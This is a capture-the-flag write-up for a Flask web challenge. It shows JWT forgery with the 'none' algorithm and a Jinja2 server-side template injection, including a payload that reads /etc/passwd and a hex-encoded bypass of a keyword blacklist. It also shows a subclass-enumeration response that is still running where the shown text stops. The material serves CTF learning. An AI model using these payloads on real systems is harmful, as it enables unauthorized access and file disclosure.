Tags: jwt web ssti 

Rating:

# X-MAS CTF 2019 – Mercenary Hat Factory

* **Category:** web
* **Points:** 424

## Challenge

> "Mmph Mmmmph Mmph Mmmph!"
> Translation: Come and visit our hat factory!
>
> Files: [server.py](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/X-MAS%20CTF%202019/Mercenary%20Hat%20Factory/server.py)
>
> Remote server: http://challs.xmas.htsp.ro:11005
>
> Author: Milkdrop

## Solution

Registering a user and analyzing cookies you will find a cookie called `auth` containing a JWT.

```
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0eXBlIjoidXNlciIsInVzZXIiOiJtM3NzYXAwIn0.6MIKOYbtUodqSJUZyT4iGRMLPcrRzbniLjJU8nhNhKY

{"typ":"JWT","alg":"HS256"}.{"type":"user","user":"m3ssap0"}.6MIKOYbtUodqSJUZyT4iGRMLPcrRzbniLjJU8nhNhKY
```

You can check its creation inside `register` and `login` methods of the source code [server.py](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/X-MAS%20CTF%202019/Mercenary%20Hat%20Factory/server.py).

Analyzing the source code you can discover two interesting endpoints:
* `/makehat` for which you have to be an authorized admin;
* `/authorize` that can let you to become an authorized admin, but there are some restrictions.

Considering the presence of template rendering operations into `/makehat` endpoint with a parameter read from the user, i.e. `hatName`, probably that functionality is vulnerable to *Server Side Template Injection* (*SSTI*) due to the insecure usage of *Flask/Jinja2* template engine.

The first check to bypass for the `/authorize` endpoint is the following.

```python
if (userData["type"] != "admin"):
return render_template ("error.html", error = "Unauthorized.")
```

This can be easily bypassed forging a JWT like the following and testing that you are an admin connecting to the root of the website.

```
{"typ":"JWT","alg":"none"}.{"type":"admin","user":"m3ssap0"}.

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ0eXBlIjoiYWRtaW4iLCJ1c2VyIjoibTNzc2FwMCJ9.
```

Checking it to the index endpoint.

```
GET / HTTP/1.1
Host: challs.xmas.htsp.ro:11005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ0eXBlIjoiYWRtaW4iLCJ1c2VyIjoibTNzc2FwMCJ9.
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2019 14:11:54 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 736
Connection: close

<head>
<link rel="stylesheet" type="text/css" href="/static/css/styles.css">
</head>

<body>
<div class="navbar">
Home

Logout

</div>
<div class="container">

<h1>Welcome <span>m3ssap0</span>!</h1>


<div>You are a Level 1 factory administrator. Here is your factory jam:


<iframe width="879" height="468" src="https://www.youtube.com/embed/aj1yZ19WuM0" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

</div>



</div>
<script src="/static/js/snow.js"></script>
</body>
```

At this point you have to break this check.

```python
if (request.form.get ('accessCode') == str (uid) + usr + pss + userpss):
authorizedAdmin [userData ["user"]] = True
```

Analyzing the code you will understand that variables are populated from Santa's data, that data is well known except its secret.

```python
adminPrivileges = [[None]*3]*500

adminPrivileges [0][0] = 0 # UID
adminPrivileges [0][1] = "Santa" #Uname
adminPrivileges [0][2] = SantaSecret
```

* `str(uid)` is `0`;
* `usr` is `Santa`;
* `pss` is the unknown `SantaSecret`;
* `userpss` can be set following the `step=1` procedure of the `/authorize` endpoint, so it can be forced.

At this point I was stuck and I was not able to bypass this check, so I did something (stupid, lol) that led me to what I think was an **unintended solution** to bypass the check: I registered a user with username `Santa`.

The user with username `Santa` was already into `adminPrivileges`, so I only crafted the correct JWT to bypass the previous check and I added the `pass` field needed by the `/makehat` endpoint.

```
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0eXBlIjoidXNlciIsInVzZXIiOiJTYW50YSJ9.zTPHtZUj9Avd1XXpM6T0nnLl7x9QeuSqaqB5ClMH8gk

{"typ":"JWT","alg":"HS256"}.{"type":"user","user":"Santa"}.zTPHtZUj9Avd1XXpM6T0nnLl7x9QeuSqaqB5ClMH8gk

{"typ":"JWT","alg":"none"}.{"type":"admin","user":"Santa","pass":"password"}.

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ0eXBlIjoiYWRtaW4iLCJ1c2VyIjoiU2FudGEiLCJwYXNzIjoiTWtvMDlpam4ifQ.
```

Here the request to the endpoint.

```
GET /makehat?hatName=test HTTP/1.1
Host: challs.xmas.htsp.ro:11005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://challs.xmas.htsp.ro:11005/register
Connection: close
Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ0eXBlIjoiYWRtaW4iLCJ1c2VyIjoiU2FudGEiLCJwYXNzIjoiTWtvMDlpam4ifQ.
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2019 00:03:09 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 459
Connection: close

<head>
<link rel="stylesheet" type="text/css" href="/static/css/styles.css">
</head>

<body>
<div class="navbar">
Home

Login
Register

</div>
<div class="container" style="text-align:center">

<h1>You are viewing:
<span>test</span></h1>
</div>
</body>

<script src="/static/js/snow.js"></script>
```

Trying the auth token to the homepage will confirm our privileges.

```
GET / HTTP/1.1
Host: challs.xmas.htsp.ro:11005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ0eXBlIjoiYWRtaW4iLCJ1c2VyIjoiU2FudGEiLCJwYXNzIjoiTWtvMDlpam4ifQ.
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2019 00:06:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 971
Connection: close

<head>
<link rel="stylesheet" type="text/css" href="/static/css/styles.css">
</head>

<body>
<div class="navbar">
Home

Logout

</div>
<div class="container">

<h1>Welcome <span>Santa</span>!</h1>


<div>You are a Level 2 factory administrator. You may now test and create new hats. You can now oversee the factory workers:


<iframe width="879" height="468" src="https://www.youtube.com/embed/QDCPKBF7a1Q" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>



<form action="/makehat" method="get">
<input placeholder="Hat Name" type="text" name="hatName">

<input type="submit" value="Make Hat!">
</form>

</div>



</div>
<script src="/static/js/snow.js"></script>
</body>
```

Trying the `{{7*7}}` payload to the `/makehat` endpoint will reveal a SSTI vulnerability.

```
GET /makehat?hatName=%7B%7B7%2A7%7D%7D HTTP/1.1
Host: challs.xmas.htsp.ro:11005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://challs.xmas.htsp.ro:11005/register
Connection: close
Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ0eXBlIjoiYWRtaW4iLCJ1c2VyIjoiU2FudGEiLCJwYXNzIjoiTWtvMDlpam4ifQ.
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2019 00:11:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 457
Connection: close

<head>
<link rel="stylesheet" type="text/css" href="/static/css/styles.css">
</head>

<body>
<div class="navbar">
Home

Login
Register

</div>
<div class="container" style="text-align:center">

<h1>You are viewing:
<span>49</span></h1>
</div>
</body>

<script src="/static/js/snow.js"></script>
```

Usually, something like the following can be used to access classes loaded into the server and to invoke them.

```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
```

But we have some restrictions, as you can see in the following blacklist used into `/makehat` endpoint.

```python
blacklist = ["config", "self", "request", "[", "]", '"', "_", "+", " ", "join", "%", "%25"]
```

So we have to use some tricks like the hexadecimal encoding of the strings and the `attr` filter of Jinja2.

The following request can be used to enumerate all classes.

```
GET /makehat?hatName={{''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|last|attr('\x5f\x5fsubclasses\x5f\x5f')()}} HTTP/1.1
Host: challs.xmas.htsp.ro:11005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://challs.xmas.htsp.ro:11005/register
Connection: close
Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ0eXBlIjoiYWRtaW4iLCJ1c2VyIjoiU2FudGEiLCJwYXNzIjoiTWtvMDlpam4ifQ.
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2019 00:30:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 36060

<head>
<link rel="stylesheet" type="text/css" href="/static/css/styles.css">
</head>

<body>
<div class="navbar">
Home

Login
Register

</div>
<div class="container" style="text-align:center">

<h1>You are viewing:
<span>[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'moduledef'>, <class 'module'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib._installed_safely'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class 'zipimport.zipimporter'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_abc_data'>, <class 'abc.ABC'>, <class 'dict_itemiterator'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'collections.deque'>, <class '_collections._deque_iterator'>, <class '_collections._deque_reverse_iterator'>, <class 'enum.auto'>, <enum 'Enum'>, <class 're.Pattern'>, <class 're.Match'>, <class '_sre.SRE_Scanner'>, <class 'sre_parse.Pattern'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 'functools.partial'>, <class 'functools._lru_cache_wrapper'>, <class 'operator.itemgetter'>, <class 'operator.attrgetter'>, <class 'operator.methodcaller'>, <class 'itertools.accumulate'>, <class 'itertools.combinations'>, <class 'itertools.combinations_with_replacement'>, <class 'itertools.cycle'>, <class 'itertools.dropwhile'>, <class 'itertools.takewhile'>, <class 'itertools.islice'>, <class 'itertools.starmap'>, <class 'itertools.chain'>, <class 'itertools.compress'>, <class 'itertools.filterfalse'>, <class 'itertools.count'>, <class 'itertools.zip_longest'>, <class 'itertools.permutations'>, <class 'itertools.product'>, <class 'itertools.repeat'>, <class 'itertools.groupby'>, <class 'itertools._grouper'>, <class 'itertools._tee'>, <class 'itertools._tee_dataobject'>, <class 'reprlib.Repr'>, <class 'collections._Link'>, <class 'functools.partialmethod'>, <class 're.Scanner'>, <class '__future__._Feature'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'importlib.abc.Finder'>, <class 'importlib.abc.Loader'>, <class 'importlib.abc.ResourceReader'>, <class 'contextlib.ContextDecorator'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'zlib.Compress'>, <class 'zlib.Decompress'>, <class 'tokenize.Untokenizer'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class '_bz2.BZ2Compressor'>, <class '_bz2.BZ2Decompressor'>, <class '_lzma.LZMACompressor'>, <class '_lzma.LZMADecompressor'>, <class 'Struct'>, <class 'unpack_iterator'>, <class 'zipfile.ZipInfo'>, <class 'zipfile.LZMACompressor'>, <class 'zipfile.LZMADecompressor'>, <class 'zipfile._SharedFile'>, <class 'zipfile._Tellable'>, <class 'zipfile.ZipFile'>, <class 'weakref.finalize._Info'>, <class 'weakref.finalize'>, <class 'pkgutil.ImpImporter'>, <class 'pkgutil.ImpLoader'>, <class 'select.poll'>, <class 'select.epoll'>, <class 'selectors.BaseSelector'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>, <class 'datetime.date'>, <class 'datetime.timedelta'>, <class 'datetime.time'>, <class 'datetime.tzinfo'>, <class 'pyexpat.xmlparser'>, <class 'plistlib.Data'>, <class 'plistlib._PlistParser'>, <class 'plistlib._DumbXMLWriter'>, <class 'plistlib._BinaryPlistParser'>, <class 'plistlib._BinaryPlistWriter'>, <class 'string.Template'>, <class 'string.Formatter'>, <class 'email.charset.Charset'>, <class 'email.header.Header'>, <class 'email.header._ValueFormatter'>, <class '_hashlib.HASH'>, <class '_blake2.blake2b'>, <class '_blake2.blake2s'>, <class '_sha3.sha3_224'>, <class '_sha3.sha3_256'>, <class '_sha3.sha3_384'>, <class '_sha3.sha3_512'>, <class '_sha3.shake_128'>, <class '_sha3.shake_256'>, <class '_random.Random'>, <class '_socket.socket'>, <class 'urllib.parse._ResultMixinStr'>, <class 'urllib.parse._ResultMixinBytes'>, <class 'urllib.parse._NetlocResultMixinBase'>, <class 'calendar._localized_month'>, <class 'calendar._localized_day'>, <class 'calendar.Calendar'>, <class 'calendar.different_locale'>, <class 'email._parseaddr.AddrlistClass'>, <class 'email._policybase._PolicyBase'>, <class 'email.feedparser.BufferedSubFile'>, <class 'email.feedparser.FeedParser'>, <class 'email.parser.Parser'>, <class 'email.parser.BytesParser'>, <class 'tempfile._RandomNameSequence'>, <class 'tempfile._TemporaryFileCloser'>, <class 'tempfile._TemporaryFileWrapper'>, <class 'tempfile.SpooledTemporaryFile'>, <class 'tempfile.TemporaryDirectory'>, <class 'textwrap.TextWrapper'>, <class 'dis.Bytecode'>, <class 'inspect.BlockFinder'>, <class 'inspect._void'>, <class 'inspect._empty'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'pkg_resources.extern.VendorImporter'>, <class 'pkg_resources._vendor.six._LazyDescr'>, <class 'pkg_resources._vendor.six._SixMetaPathImporter'>, <class 'pkg_resources._vendor.six._LazyDescr'>, <class 'pkg_resources._vendor.six._SixMetaPathImporter'>, <class 'pkg_resources._vendor.appdirs.AppDirs'>, <class 'pkg_resources.extern.packaging._structures.Infinity'>, <class 'pkg_resources.extern.packaging._structures.NegativeInfinity'>, <class 'pkg_resources.extern.packaging.version._BaseVersion'>, <class 'pkg_resources.extern.packaging.specifiers.BaseSpecifier'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class 'pkg_resources._vendor.pyparsing._Constants'>, <class 'pkg_resources._vendor.pyparsing._ParseResultsWithOffset'>, <class 'pkg_resources._vendor.pyparsing.ParseResults'>, <class 'pkg_resources._vendor.pyparsing.ParserElement._UnboundedCache'>, <class 'pkg_resources._vendor.pyparsing.ParserElement._FifoCache'>, <class 'pkg_resources._vendor.pyparsing.ParserElement'>, <class 'pkg_resources._vendor.pyparsing._NullToken'>, <class 'pkg_resources._vendor.pyparsing.OnlyOnce'>, <class 'pkg_resources._vendor.pyparsing.pyparsing_common'>, <class 'pkg_resources.extern.packaging.markers.Node'>, <class 'pkg_resources.extern.packaging.markers.Marker'>, <class 'pkg_resources.extern.packaging.requirements.Requirement'>, <class 'pkg_resources.IMetadataProvider'>, <class 'pkg_resources.WorkingSet'>, <class 'pkg_resources.Environment'>, <class 'pkg_resources.ResourceManager'>, <class 'pkg_resources.NullProvider'>, <class 'pkg_resources.NoDists'>, <class 'pkg_resources.EntryPoint'>, <class 'pkg_resources.Distribution'>, <class 'gunicorn.six._LazyDescr'>, <class 'gunicorn.six._SixMetaPathImporter'>, <class 'logging.LogRecord'>, <class 'logging.PercentStyle'>, <class 'logging.Formatter'>, <class 'logging.BufferingFormatter'>, <class 'logging.Filter'>, <class 'logging.Filterer'>, <class 'logging.PlaceHolder'>, <class 'logging.Manager'>, <class 'logging.LoggerAdapter'>, <class 'gunicorn.pidfile.Pidfile'>, <class 'gunicorn.sock.BaseSocket'>, <class 'gunicorn.arbiter.Arbiter'>, <class 'gettext.NullTranslations'>, <class 'argparse._AttributeHolder'>, <class 'argparse.HelpFormatter._Section'>, <class 'argparse.HelpFormatter'>, <class 'argparse.FileType'>, <class 'argparse._ActionsContainer'>, <class '_ssl._SSLContext'>, <class '_ssl._SSLSocket'>, <class '_ssl.MemoryBIO'>, <class '_ssl.Session'>, <class 'ssl.SSLObject'>, <class 'shlex.shlex'>, <class 'gunicorn.reloader.InotifyReloader'>, <class 'gunicorn.config.Config'>, <class 'gunicorn.config.Setting'>, <class 'gunicorn.debug.Spew'>, <class 'gunicorn.app.base.BaseApplication'>, <class 'pickle._Framer'>, <class 'pickle._Unframer'>, <class 'pickle._Pickler'>, <class 'pickle._Unpickler'>, <class '_pickle.Unpickler'>, <class '_pickle.Pickler'>, <class '_pickle.Pdata'>, <class '_pickle.PicklerMemoProxy'>, <class '_pickle.UnpicklerMemoProxy'>, <class '_queue.SimpleQueue'>, <class 'queue.Queue'>, <class 'queue._PySimpleQueue'>, <class 'logging.handlers.QueueListener'>, <class 'socketserver.BaseServer'>, <class 'socketserver.ForkingMixIn'>, <class 'socketserver.ThreadingMixIn'>, <class 'socketserver.BaseRequestHandler'>, <class 'logging.config.ConvertingMixin'>, <class 'logging.config.BaseConfigurator'>, <class 'gunicorn.glogging.Logger'>, <class 'gunicorn.http.unreader.Unreader'>, <class 'gunicorn.http.body.ChunkedReader'>, <class 'gunicorn.http.body.LengthReader'>, <class 'gunicorn.http.body.EOFReader'>, <class 'gunicorn.http.body.Body'>, <class 'gunicorn.http.message.Message'>, <class 'gunicorn.http.parser.Parser'>, <class 'gunicorn.http.wsgi.FileWrapper'>, <class 'gunicorn.http.wsgi.Response'>, <class 'gunicorn.workers.workertmp.WorkerTmp'>, <class 'gunicorn.workers.base.Worker'>, <class 'concurrent.futures._base._Waiter'>, <class 'concurrent.futures._base._AcquireFutures'>, <class 'concurrent.futures._base.Future'>, <class 'concurrent.futures._base.Executor'>, <class 'asyncio.coroutines.CoroWrapper'>, <class 'asyncio.events.Handle'>, <class 'asyncio.events.AbstractServer'>, <class 'asyncio.events.AbstractEventLoop'>, <class 'asyncio.events.AbstractEventLoopPolicy'>, <class '_asyncio.Future'>, <class '_asyncio.FutureIter'>, <class 'TaskStepMethWrapper'>, <class 'TaskWakeupMethWrapper'>, <class '_RunningLoopHolder'>, <class 'asyncio.futures.Future'>, <class 'asyncio.protocols.BaseProtocol'>, <class 'asyncio.transports.BaseTransport'>, <class 'asyncio.sslproto._SSLPipe'>, <class 'asyncio.locks._ContextManager'>, <class 'asyncio.locks._ContextManagerMixin'>, <class 'asyncio.locks.Event'>, <class 'asyncio.queues.Queue'>, <class 'asyncio.streams.StreamWriter'>, <class 'asyncio.streams.StreamReader'>, <class 'asyncio.subprocess.Process'>, <class 'asyncio.unix_events.AbstractChildWatcher'>, <class 'gunicorn.selectors.BaseSelector'>, <class 'gunicorn.workers.gthread.TConn'>, <class 'concurrent.futures.thread._WorkItem'>, <class '_ast.AST'>, <class '_json.Scanner'>, <class '_json.Encoder'>, <class 'json.decoder.JSONDecoder'>, <class 'json.encoder.JSONEncoder'>, <class 'jinja2.utils.MissingType'>, <class 'jinja2.utils.LRUCache'>, <class 'jinja2.utils.Cycler'>, <class 'jinja2.utils.Joiner'>, <class 'jinja2.utils.Namespace'>, <class 'markupsafe._MarkupEscapeHelper'>, <class 'jinja2.nodes.EvalContext'>, <class 'jinja2.nodes.Node'>, <class 'jinja2.runtime.TemplateReference'>, <class 'jinja2.runtime.Context'>, <class 'jinja2.runtime.BlockReference'>, <class 'jinja2.runtime.LoopContextBase'>, <class 'jinja2.runtime.LoopContextIterator'>, <class 'jinja2.runtime.Macro'>, <class 'jinja2.runtime.Undefined'>, <class 'decimal.Decimal'>, <class 'decimal.Context'>, <class 'decimal.SignalDictMixin'>, <class 'decimal.ContextManager'>, <class 'numbers.Number'>, <class 'jinja2.lexer.Failure'>, <class 'jinja2.lexer.TokenStreamIterator'>, <class 'jinja2.lexer.TokenStream'>, <class 'jinja2.lexer.Lexer'>, <class 'jinja2.parser.Parser'>, <class 'jinja2.visitor.NodeVisitor'>, <class 'jinja2.idtracking.Symbols'>, <class 'jinja2.compiler.MacroRef'>, <class 'jinja2.compiler.Frame'>, <class 'jinja2.environment.Environment'>, <class 'jinja2.environment.Template'>, <class 'jinja2.environment.TemplateModule'>, <class 'jinja2.environment.TemplateExpression'>, <class 'jinja2.environment.TemplateStream'>, <class 'jinja2.loaders.BaseLoader'>, <class 'jinja2.bccache.Bucket'>, <class 'jinja2.bccache.BytecodeCache'>, <class 'jinja2.asyncsupport.AsyncLoopContextIterator'>, <class 'werkzeug._internal._Missing'>, <class 'werkzeug._internal._DictAccessorProperty'>, <class 'werkzeug.utils.HTMLBuilder'>, <class 'werkzeug.exceptions.Aborter'>, <class 'werkzeug.urls.Href'>, <class 'email.message.Message'>, <class 'http.client.HTTPConnection'>, <class 'mimetypes.MimeTypes'>, <class 'werkzeug.serving.WSGIRequestHandler'>, <class 'werkzeug.serving._SSLContext'>, <class 'werkzeug.serving.BaseWSGIServer'>, <class 'werkzeug.datastructures.ImmutableListMixin'>, <class 'werkzeug.datastructures.ImmutableDictMixin'>, <class 'werkzeug.datastructures.UpdateDictMixin'>, <class 'werkzeug.datastructures.ViewItems'>, <class 'werkzeug.datastructures._omd_bucket'>, <class 'werkzeug.datastructures.Headers'>, <class 'werkzeug.datastructures.ImmutableHeadersMixin'>, <class 'werkzeug.datastructures.IfRange'>, <class 'werkzeug.datastructures.Range'>, <class 'werkzeug.datastructures.ContentRange'>, <class 'werkzeug.datastructures.FileStorage'>, <class 'urllib.request.Request'>, <class 'urllib.request.OpenerDirector'>, <class 'urllib.request.BaseHandler'>, <class 'urllib.request.HTTPPasswordMgr'>, <class 'urllib.request.AbstractBasicAuthHandler'>, <class 'urllib.request.AbstractDigestAuthHandler'>, <class 'urllib.request.URLopener'>, <class 'urllib.request.ftpwrapper'>, <class 'werkzeug.wrappers.accept.AcceptMixin'>, <class 'werkzeug.wrappers.auth.AuthorizationMixin'>, <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>, <class 'werkzeug.wsgi.ClosingIterator'>, <class 'werkzeug.wsgi.FileWrapper'>, <class 'werkzeug.wsgi._RangeWrapper'>, <class 'werkzeug.formparser.FormDataParser'>, <class 'werkzeug.formparser.MultiPartParser'>, <class 'werkzeug.wrappers.base_request.BaseRequest'>, <class 'werkzeug.wrappers.base_response.BaseResponse'>, <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>, <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>, <class 'werkzeug.wrappers.etag.ETagRequestMixin'>, <class 'werkzeug.wrappers.etag.ETagResponseMixin'>, <class 'werkzeug.useragents.UserAgentParser'>, <class 'werkzeug.useragents.UserAgent'>, <class 'werkzeug.wrappers.user_agent.UserAgentMixin'>, <class 'werkzeug.wrappers.request.StreamOnlyMixin'>, <class 'werkzeug.wrappers.response.ResponseStream'>, <class 'werkzeug.wrappers.response.ResponseStreamMixin'>, <class 'http.cookiejar.Cookie'>, <class 'http.cookiejar.CookiePolicy'>, <class 'http.cookiejar.Absent'>, <class 'http.cookiejar.CookieJar'>, <class 'werkzeug.test._TestCookieHeaders'>, <class 'werkzeug.test._TestCookieResponse'>, <class 'werkzeug.test.EnvironBuilder'>, <class 'werkzeug.test.Client'>, <class 'uuid.UUID'>, <class 'itsdangerous._json._CompactJSON'>, <class 'hmac.HMAC'>, <class 'itsdangerous.signer.SigningAlgorithm'>, <class 'itsdangerous.signer.Signer'>, <class 'itsdangerous.serializer.Serializer'>, <class 'itsdangerous.url_safe.URLSafeSerializerMixin'>, <class 'flask._compat._DeprecatedBool'>, <class 'greenlet.greenlet'>, <class 'werkzeug.local.Local'>, <class 'werkzeug.local.LocalStack'>, <class 'werkzeug.local.LocalManager'>, <class 'werkzeug.local.LocalProxy'>, <class 'dataclasses._HAS_DEFAULT_FACTORY_CLASS'>, <class 'dataclasses._MISSING_TYPE'>, <class 'dataclasses._FIELD_BASE'>, <class 'dataclasses.InitVar'>, <class 'dataclasses.Field'>, <class 'dataclasses._DataclassParams'>, <class 'ast.NodeVisitor'>, <class 'difflib.SequenceMatcher'>, <class 'difflib.Differ'>, <class 'difflib.HtmlDiff'>, <class 'werkzeug.routing.RuleFactory'>, <class 'werkzeug.routing.RuleTemplate'>, <class 'werkzeug.routing.BaseConverter'>, <class 'werkzeug.routing.Map'>, <class 'werkzeug.routing.MapAdapter'>, <class 'click._compat._FixupStream'>, <class 'click._compat._AtomicFile'>, <class 'click.utils.LazyFile'>, <class 'click.utils.KeepOpenFile'>, <class 'click.utils.PacifyFlushWrapper'>, <class 'click.types.ParamType'>, <class 'click.parser.Option'>, <class 'click.parser.Argument'>, <class 'click.parser.ParsingState'>, <class 'click.parser.OptionParser'>, <class 'click.formatting.HelpFormatter'>, <class 'click.core.Context'>, <class 'click.core.BaseCommand'>, <class 'click.core.Parameter'>, <class 'flask.signals.Namespace'>, <class 'flask.signals._FakeSignal'>, <class 'flask.helpers.locked_cached_property'>, <class 'flask.helpers._PackageBoundObject'>, <class 'flask.cli.DispatchingApp'>, <class 'flask.cli.ScriptInfo'>, <class 